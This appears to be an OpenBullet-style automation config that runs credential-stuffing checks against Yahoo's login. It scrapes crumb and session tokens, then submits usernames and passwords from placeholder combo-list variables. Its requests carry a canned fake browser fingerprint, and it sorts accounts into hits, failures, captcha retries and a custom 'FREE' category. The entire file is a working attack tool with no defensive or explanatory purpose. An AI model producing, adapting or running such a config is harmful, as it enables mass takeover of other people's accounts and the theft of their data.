[SETTINGS]
{
  "Name": "test12ss",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-12-09T05:45:27.3126602-07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://login.yahoo.com/?appid=com.yahoo.mobile.client.android.weather&appsrc=yweatherandroid&appsrcv=1.30.60&display=narrow&intl=fr&lang=fr-FR&src=androidphnx&srcv=8.13.4&.asdk_embedded=1&activity=default&pspid=954007775&theme=dark&done=https%3A%2F%2Fapi.login.yahoo.com%2Foauth2%2Fauthorize%3F.asdk_embedded%3D1%26.scrumb%3D0%26appid%3Dcom.yahoo.mobile.client.android.weather%26appsrcv%3D1.30.60%26client_id%3DZqWPsmDnmoZPTuFP%26code_challenge%3DQdmX6sKxOnUAQEBcaql_Ap2_GrM1OuOXrDF8inaxnck%26code_challenge_method%3DS256%26intl%3Dfr%26language%3Dfr-FR%26nonce%3D04VIr9V4rAC5Hnmer6HzODrtjciDTYTc%26push%3D1%26redirect_uri%3Dcom.yahoo.mobile.client.android.weather%253A%252F%252Fphoenix%252Fcallback_auth%26response_type%3Dcode%26scope%3Dopenid%2520device_sso%26sdk-device-id%3DODg2YTAyMGIyNTY0NjE3NmM1ZDU3YmJlYjIyYzczYjE1N2ZiZDU1ZGYw%26src%3Dandroidphnx%26srcv%3D8.13.4%26state%3DyXC5qJi0wo5HYsUsZ_o6mg%26theme%3Ddark%26webview%3D1&prefill=0&prompt=login&chllngnm=base" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "acrumb\" value=\"" "\"" -> VAR "ac" 

PARSE "<SOURCE>" LR "name=\"crumb\" value=\"" "\"" -> VAR "c" 

PARSE "<SOURCE>" LR "\"sessionIndex\" value=\"" "\"" -> VAR "si" 

REQUEST POST "https://login.yahoo.com/?appid=com.yahoo.mobile.client.android.weather&appsrc=yweatherandroid&appsrcv=1.30.60&display=narrow&intl=fr&lang=fr-FR&src=androidphnx&srcv=8.13.4&.asdk_embedded=1&activity=default&pspid=954007775&theme=dark&done=https%3A%2F%2Fapi.login.yahoo.com%2Foauth2%2Fauthorize%3F.asdk_embedded%3D1%26.scrumb%3D0%26appid%3Dcom.yahoo.mobile.client.android.weather%26appsrcv%3D1.30.60%26client_id%3DZqWPsmDnmoZPTuFP%26code_challenge%3DQdmX6sKxOnUAQEBcaql_Ap2_GrM1OuOXrDF8inaxnck%26code_challenge_method%3DS256%26intl%3Dfr%26language%3Dfr-FR%26nonce%3D04VIr9V4rAC5Hnmer6HzODrtjciDTYTc%26push%3D1%26redirect_uri%3Dcom.yahoo.mobile.client.android.weather%253A%252F%252Fphoenix%252Fcallback_auth%26response_type%3Dcode%26scope%3Dopenid%2520device_sso%26sdk-device-id%3DODg2YTAyMGIyNTY0NjE3NmM1ZDU3YmJlYjIyYzczYjE1N2ZiZDU1ZGYw%26src%3Dandroidphnx%26srcv%3D8.13.4%26state%3DyXC5qJi0wo5HYsUsZ_o6mg%26theme%3Ddark%26webview%3D1&prefill=0&prompt=login&chllngnm=base" 
  CONTENT "browser-fp-data=%7B%22language%22%3A%22en-GB%22%2C%22colorDepth%22%3A24%2C%22deviceMemory%22%3A8%2C%22pixelRatio%22%3A1%2C%22hardwareConcurrency%22%3A6%2C%22timezoneOffset%22%3A-60%2C%22timezone%22%3A%22Africa%2FTunis%22%2C%22sessionStorage%22%3A1%2C%22localStorage%22%3A1%2C%22indexedDb%22%3A1%2C%22openDatabase%22%3A1%2C%22cpuClass%22%3A%22unknown%22%2C%22platform%22%3A%22Win32%22%2C%22doNotTrack%22%3A%22unknown%22%2C%22plugins%22%3A%7B%22count%22%3A3%2C%22hash%22%3A%226f6b3a1cdd756b937b638391e9896bc0%22%7D%2C%22canvas%22%3A%22canvas%20winding%3Ayes~canvas%22%2C%22webgl%22%3A1%2C%22webglVendorAndRenderer%22%3A%22Google%20Inc.%20(NVIDIA)~ANGLE%20(NVIDIA%2C%20NVIDIA%20GeForce%20GTX%201660%20SUPER%20Direct3D11%20vs_5_0%20ps_5_0%2C%20D3D11-27.21.14.5671)%22%2C%22adBlock%22%3A0%2C%22hasLiedLanguages%22%3A0%2C%22hasLiedResolution%22%3A0%2C%22hasLiedOs%22%3A0%2C%22hasLiedBrowser%22%3A0%2C%22touchSupport%22%3A%7B%22points%22%3A0%2C%22event%22%3A0%2C%22start%22%3A0%7D%2C%22fonts%22%3A%7B%22count%22%3A33%2C%22hash%22%3A%22edeefd360161b4bf944ac045e41d0b21%22%7D%2C%22audio%22%3A%22124.04347527516074%22%2C%22resolution%22%3A%7B%22w%22%3A%221920%22%2C%22h%22%3A%221080%22%7D%2C%22availableResolution%22%3A%7B%22w%22%3A%221040%22%2C%22h%22%3A%221920%22%7D%2C%22ts%22%3A%7B%22serve%22%3A1635089977253%2C%22render%22%3A1635089976683%7D%7D&crumb=<c>&acrumb=<ac>&sessionIndex=<si>&displayName=&deviceCapability=&username=<USER>&passwd=&signin=Suivant" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.yahoo.com" 
  HEADER "Origin: https://login.yahoo.com" 
  HEADER "Referer: https://login.yahoo.com/?appid=com.yahoo.mobile.client.android.weather&appsrc=yweatherandroid&appsrcv=1.30.60&display=narrow&intl=fr&lang=fr-FR&src=androidphnx&srcv=8.13.4&.asdk_embedded=1&activity=default&pspid=954007775&theme=dark&done=https%3A%2F%2Fapi.login.yahoo.com%2Foauth2%2Fauthorize%3F.asdk_embedded%3D1%26.scrumb%3D0%26appid%3Dcom.yahoo.mobile.client.android.weather%26appsrcv%3D1.30.60%26client_id%3DZqWPsmDnmoZPTuFP%26code_challenge%3DQdmX6sKxOnUAQEBcaql_Ap2_GrM1OuOXrDF8inaxnck%26code_challenge_method%3DS256%26intl%3Dfr%26language%3Dfr-FR%26nonce%3D04VIr9V4rAC5Hnmer6HzODrtjciDTYTc%26push%3D1%26redirect_uri%3Dcom.yahoo.mobile.client.android.weather%253A%252F%252Fphoenix%252Fcallback_auth%26response_type%3Dcode%26scope%3Dopenid%2520device_sso%26sdk-device-id%3DODg2YTAyMGIyNTY0NjE3NmM1ZDU3YmJlYjIyYzczYjE1N2ZiZDU1ZGYw%26src%3Dandroidphnx%26srcv%3D8.13.4%26state%3DyXC5qJi0wo5HYsUsZ_o6mg%26theme%3Ddark%26webview%3D1&prefill=0&prompt=login&chllngnm=base" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36" 
  HEADER "X-Requested-With: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "challenge/password" 
  KEYCHAIN Failure OR 
    KEY "INVALID_USERNAME" 
  KEYCHAIN Retry OR 
    KEY "captcha" 

PARSE "<SOURCE>" JSON "location" -> VAR "loc" 

REQUEST POST "https://login.yahoo.com<loc>" AutoRedirect=FALSE 
  CONTENT "browser-fp-data=%7B%22language%22%3A%22en-GB%22%2C%22colorDepth%22%3A24%2C%22deviceMemory%22%3A8%2C%22pixelRatio%22%3A1%2C%22hardwareConcurrency%22%3A6%2C%22timezoneOffset%22%3A-60%2C%22timezone%22%3A%22Africa%2FTunis%22%2C%22sessionStorage%22%3A1%2C%22localStorage%22%3A1%2C%22indexedDb%22%3A1%2C%22openDatabase%22%3A1%2C%22cpuClass%22%3A%22unknown%22%2C%22platform%22%3A%22Win32%22%2C%22doNotTrack%22%3A%22unknown%22%2C%22plugins%22%3A%7B%22count%22%3A3%2C%22hash%22%3A%226f6b3a1cdd756b937b638391e9896bc0%22%7D%2C%22canvas%22%3A%22canvas+winding%3Ayes%7Ecanvas%22%2C%22webgl%22%3A1%2C%22webglVendorAndRenderer%22%3A%22Google+Inc.+%28NVIDIA%29%7EANGLE+%28NVIDIA%2C+NVIDIA+GeForce+GTX+1660+SUPER+Direct3D11+vs_5_0+ps_5_0%2C+D3D11-27.21.14.5671%29%22%2C%22adBlock%22%3A0%2C%22hasLiedLanguages%22%3A0%2C%22hasLiedResolution%22%3A0%2C%22hasLiedOs%22%3A0%2C%22hasLiedBrowser%22%3A0%2C%22touchSupport%22%3A%7B%22points%22%3A0%2C%22event%22%3A0%2C%22start%22%3A0%7D%2C%22fonts%22%3A%7B%22count%22%3A33%2C%22hash%22%3A%22edeefd360161b4bf944ac045e41d0b21%22%7D%2C%22audio%22%3A%22124.04347527516074%22%2C%22resolution%22%3A%7B%22w%22%3A%221920%22%2C%22h%22%3A%221080%22%7D%2C%22availableResolution%22%3A%7B%22w%22%3A%221040%22%2C%22h%22%3A%221920%22%7D%2C%22ts%22%3A%7B%22serve%22%3A1635089980346%2C%22render%22%3A1635089979750%7D%7D&crumb=<c>&acrumb=<ac>&sessionIndex=<si>&displayName=<USER>&deviceCapability=&username=<USER>&passwordContext=normal&isShowButtonClicked=&showButtonStatus=&prefersReducedMotion=&password=<PASS>&verifyPassword=Suivant" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.yahoo.com" 
  HEADER "Origin: https://login.yahoo.com" 
  HEADER "Referer: https://login.yahoo.com/?appid=com.yahoo.mobile.client.android.weather&appsrc=yweatherandroid&appsrcv=1.30.60&display=narrow&intl=fr&lang=fr-FR&src=androidphnx&srcv=8.13.4&.asdk_embedded=1&activity=default&pspid=954007775&theme=dark&done=https%3A%2F%2Fapi.login.yahoo.com%2Foauth2%2Fauthorize%3F.asdk_embedded%3D1%26.scrumb%3D0%26appid%3Dcom.yahoo.mobile.client.android.weather%26appsrcv%3D1.30.60%26client_id%3DZqWPsmDnmoZPTuFP%26code_challenge%3DQdmX6sKxOnUAQEBcaql_Ap2_GrM1OuOXrDF8inaxnck%26code_challenge_method%3DS256%26intl%3Dfr%26language%3Dfr-FR%26nonce%3D04VIr9V4rAC5Hnmer6HzODrtjciDTYTc%26push%3D1%26redirect_uri%3Dcom.yahoo.mobile.client.android.weather%253A%252F%252Fphoenix%252Fcallback_auth%26response_type%3Dcode%26scope%3Dopenid%2520device_sso%26sdk-device-id%3DODg2YTAyMGIyNTY0NjE3NmM1ZDU3YmJlYjIyYzczYjE1N2ZiZDU1ZGYw%26src%3Dandroidphnx%26srcv%3D8.13.4%26state%3DyXC5qJi0wo5HYsUsZ_o6mg%26theme%3Ddark%26webview%3D1&prefill=0&prompt=login&chllngnm=base" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36" 
  HEADER "X-Requested-With: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "https://api.login.yahoo.com/oauth2/" 
  KEYCHAIN Failure OR 
    KEY "/account/challenge/password?" 
    KEY "/account/challenge/fail?" 
  KEYCHAIN Custom "FREE" OR 
    KEY "selector" 